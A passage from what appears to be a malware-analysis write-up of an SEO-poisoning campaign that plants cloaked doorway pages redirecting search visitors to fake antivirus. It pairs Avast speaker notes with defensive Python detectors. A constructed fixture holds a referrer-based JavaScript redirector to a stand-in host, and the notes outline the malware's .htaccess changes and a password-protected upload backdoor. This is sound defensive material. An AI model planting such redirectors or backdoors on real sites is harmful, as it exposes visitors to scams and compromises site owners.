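INNER = "<?php $f = base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n'); echo $f; ?>"
SAMPLE = build_sample(INNER, layers=3)

if __name__ == "__main__":
    code, n = deobfuscate(SAMPLE)
    print(f"removed {n} eval layer(s); recovered code:\n{code}")
```

The real script has more than 400 lines after the final layer (speaker note 15), so the output of deobfuscate() is the starting point for reading, not the end of the analysis. If a sample uses gzinflate() instead of gzuncompress(), the data is raw deflate and zlib.decompress() needs wbits=-15.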

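Slides 18 to 22, 28 and 32 describe what a generated doorway page looks like: the site's own template with a keyword <h1>, shuffled text stuffed with hot-linked <img> tags carrying keyword alt text, a referrer-based JavaScript redirector, the HEIGTH= typo in the image tag, and (speaker note 17) a googlebot noarchive meta tag that keeps the page out of Google's cache. The Python below is an added example of scoring a fetched page on those structural indicators so a webmaster can triage suspicious URLs offline; it is not the Avast authors' detection logic. Both sample pages are constructed, the threshold of three hot-linked keyword images and the "two indicators" verdict are assumptions, and example.com / example.net / .invalid are reserved names.

```python
"""Structural indicators of a generated doorway page (added example, constructed samples)."""
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urlparse


class DoorwayScan(HTMLParser):
    """Collects the indicators described on slides 20, 28 and 32 and in speaker note 17."""

    def __init__(self, site_host: str) -> None:
        super().__init__()
        self.site_host = site_host.lower()
        self.noarchive = False
        self.hotlinked_alt_imgs = 0
        self.heigth_typo = False
        self.referrer_redirect = False
        self._script: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, str]]) -> None:
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lower-cases tag and attribute names
        if tag == "meta" and a.get("name", "").lower() == "googlebot" \
                and "noarchive" in a.get("content", "").lower():
            self.noarchive = True
        elif tag == "img":
            if "heigth" in a:  # the template typo noted on slide 32
                self.heigth_typo = True
            host = urlparse(a.get("src", "")).netloc.lower()
            if host and host != self.site_host and a.get("alt", "").strip():
                self.hotlinked_alt_imgs += 1
        elif tag == "script":
            self._in_script = True

    def handle_data(self, data: str) -> None:
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag: str) -> None:
        if tag == "script":
            self._in_script = False
            js = "".join(self._script)
            self._script = []
            # The slide-28 redirector builds a URL from document.referrer and assigns location.
            if "document.referrer" in js and ("location.href" in js or "document.location" in js):
                self.referrer_redirect = True


def assess(html: str, site_host: str, hotlink_threshold: int = 3) -> Dict[str, object]:
    """Score one page; two or more indicators is treated as 'likely doorway' (assumed threshold)."""
    scan = DoorwayScan(site_host)
    scan.feed(html)
    scan.close()
    hits = {
        "noarchive": scan.noarchive,
        "hotlinked_keyword_images": scan.hotlinked_alt_imgs >= hotlink_threshold,
        "heigth_typo": scan.heigth_typo,
        "referrer_redirect": scan.referrer_redirect,
    }
    score = sum(hits.values())
    return {"indicators": hits, "score": score, "likely_doorway": score >= 2}


# Constructed doorway-style page following the slide-22 layout.
DOORWAY = """<html><head>
<title>Search Keywords</title>
<meta name="googlebot" content="noarchive">
</head><body>
<h1>SEARCH KEYWORD</h1>
<p>harmful action against a person or group in response revenge to a grievance
<img src="http://img.example.net/a.jpg" alt="search keywords" align="left">
be it real or <img src="http://pics.example.net/b.jpg" alt="search keywords" align="center">
perceived <img src="http://cdn.example.net/c.jpg" alt="search keywords" align="right"></p>
<IMG HEIGTH="1" WIDTH="1" src="http://example.com/spacer.gif">
<script>
var URL = "http://redirect.invalid/?r=" + encodeURIComponent(document.referrer);
if (window != top) { top.location.href = URL; } else document.location = URL;
</script>
</body></html>"""

# Constructed ordinary page: one local image, no referrer logic.
CLEAN = """<html><head><title>Our company</title></head><body>
<img src="/logo.png" alt="logo"><p>Opening hours...</p>
<script>console.log("hello");</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("doorway", DOORWAY), ("clean", CLEAN)):
        print(name, assess(page, "example.com"))
```

The host comparison is deliberately strict (www. and CDN variants of your own site count as hot-linked), so pass the host exactly as it appears in your own image URLs or extend the check to a list of your hosts. Because the doorway pages are cloaked, the HTML fed to assess() has to be fetched with a search-engine Referer to see the version a victim receives.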
Editor's Notes

  1. Introduction
  2. Mention: a successful attack (and why), and how it “works” (in general)
  3. SEO – images are “well ranked”
  4. Redirection to FAKE AV; management is handled by the remote server
  5. How it works and who it is aimed at. At the beginning they did not “distinguish” between OS or browsers
  6. What do the bad guys want? Money!
  7. Black SEO
  8. Trust phenomenon
  9. Different behaviour -> hand over to the other speaker
  10. Before dissecting the behaviour, mention HOW the “legitimate websites” got infected + add a “story”
  11. Briefly!
  12. Main PHP script + story – talk; only “list” the script's functions (do not dissect them)
  13. What it looked like at first, and what we had to do with it (decode)
  14. It has two arrays from which it builds the resulting script (no details)
  15. Whole PHP script has more than 400 lines of code + decision logic
  16. The main reason for success! What it is intended for – what it uses (template). The template is generated from the main page of the given “site” == they are “inconspicuous”
  17. Why can't we find these pages in Google results for easier detection? They used a simple tag <meta name=”googlebot” content=”noarchive”>. shab100500.txt contains the HTML code of the site's homepage with the <REPLACEME> placeholder, which will later be replaced with a generated spammy block. The original <title> tag is replaced with <title>Search Keywords</title> and the <meta name=”googlebot” content=”noarchive”> tag is inserted — that's why you don't see cached copies of the pages in Google search results, which definitely makes diagnosing the problem more difficult for webmasters. It simulates the look of Google Ads – what it puts in there (explain) – <noarchive>
  18. They modify or create .htaccess with this code. Script_name is the path to the uploaded .php file
  19. Probably caused by low profit from other search engines (less chance to be found if they use only one of the three browsers). The name of the remote server is stored in xml.cgi as a base64 string. Describe the “old” system
  20. Which parameters and what they use them for
  21. Description of the “redirection”
  22. The spam page is shown for unwanted visits
  23. 1. To be less suspicious when they are looking for top search keywords. .cgi files produce server errors when you try to open them in directories that aren't configured to execute CGI scripts. Working with free blog sites – posting posts with hundreds of links to doorway pages
  24. Maintenance request: to be able to change the xml.txt (xml.cgi file in the newest version (with the domain name of the remote server)) and to use a file uploader, you now need to provide a password in the “name” parameter of a POST request. Someone who knows how the maintenance request works could change it to redirect to their own site. This request updates the content of the xmlrpc.txt file with the domain name of a malicious server that hosts fresh redirect code. ?up100500=<some-value> – this request turns the script into an upload form.
  25. We are blocking 174 sites used for the attack – of course we have different, more sophisticated detections
  26. This is based on Google blocking
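Slides 11 and 17 and speaker note 22 explain why the infection stays hidden from the site owner: the PHP script serves the redirector only when the Referer contains google., yahoo. or bing. or the User-Agent is Opera, and everyone else gets the ordinary page. The Python below is an added example of the check a webmaster can run against their own site, fetching one URL under several visitor profiles and comparing the bodies; it is not the Avast authors' tooling. The profile headers are assumptions, the simulated sites are constructed stand-ins that reproduce the slide-17 decision so the block runs offline, and example.com is a reserved name.

```python
"""Cloaking audit: does the same URL answer differently to search-engine referrals or Opera?
(added example, constructed simulated sites)"""
import hashlib
import urllib.request
from typing import Callable, Dict, List

Fetcher = Callable[[str, Dict[str, str]], bytes]

BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100 Safari/537.36"
OPERA_UA = "Opera/9.80 (Windows NT 6.1) Presto/2.9.168 Version/11.50"

# Visitor profiles compared against the plain "direct" request (assumed header values).
PROFILES: Dict[str, Dict[str, str]] = {
    "direct":      {"User-Agent": BROWSER_UA},
    "from-google": {"User-Agent": BROWSER_UA, "Referer": "https://www.google.com/"},
    "from-yahoo":  {"User-Agent": BROWSER_UA, "Referer": "https://search.yahoo.com/"},
    "from-bing":   {"User-Agent": BROWSER_UA, "Referer": "https://www.bing.com/"},
    "opera":       {"User-Agent": OPERA_UA},
}


def urllib_fetch(url: str, headers: Dict[str, str]) -> bytes:
    """Real fetcher: a plain GET with the given headers."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read()


def digest(body: bytes) -> str:
    return hashlib.sha256(body).hexdigest()


def audit(url: str, fetch: Fetcher = urllib_fetch) -> Dict[str, object]:
    """Report which profiles receive a different body than a direct visit.

    The direct profile is fetched twice first; if those two differ the page is
    dynamic (nonces, timestamps) and a body comparison is not meaningful.
    """
    base1 = digest(fetch(url, PROFILES["direct"]))
    base2 = digest(fetch(url, PROFILES["direct"]))
    if base1 != base2:
        return {"stable": False, "cloaked": None, "divergent": []}
    divergent: List[str] = []
    for name, headers in PROFILES.items():
        if name != "direct" and digest(fetch(url, headers)) != base1:
            divergent.append(name)
    return {"stable": True, "cloaked": bool(divergent), "divergent": divergent}


def simulated_infected_site(url: str, headers: Dict[str, str]) -> bytes:
    """Constructed stand-in for the slide-17 decision: the redirector goes to search-engine
    referrals or Opera, the ordinary page to everyone else."""
    ref = headers.get("Referer", "")
    ua = headers.get("User-Agent", "")
    if "Opera" in ua or any(s in ref for s in ("google.", "yahoo.", "bing.")):
        return b"<html><script>/* redirector would be here */</script></html>"
    return b"<html><body>Ordinary page</body></html>"


def simulated_clean_site(url: str, headers: Dict[str, str]) -> bytes:
    """Constructed stand-in for a site that answers every visitor the same way."""
    return b"<html><body>Ordinary page</body></html>"


if __name__ == "__main__":
    print("infected:", audit("http://example.com/", fetch=simulated_infected_site))
    print("clean:   ", audit("http://example.com/", fetch=simulated_clean_site))
```

Slide 24 says the later version of the script reacts to Google only, so the from-google profile is the one that must be part of any routine check; a difference there on a page that is otherwise stable is the signal to go and look at the .htaccess rules and the .log/SITE/ files listed on slide 13.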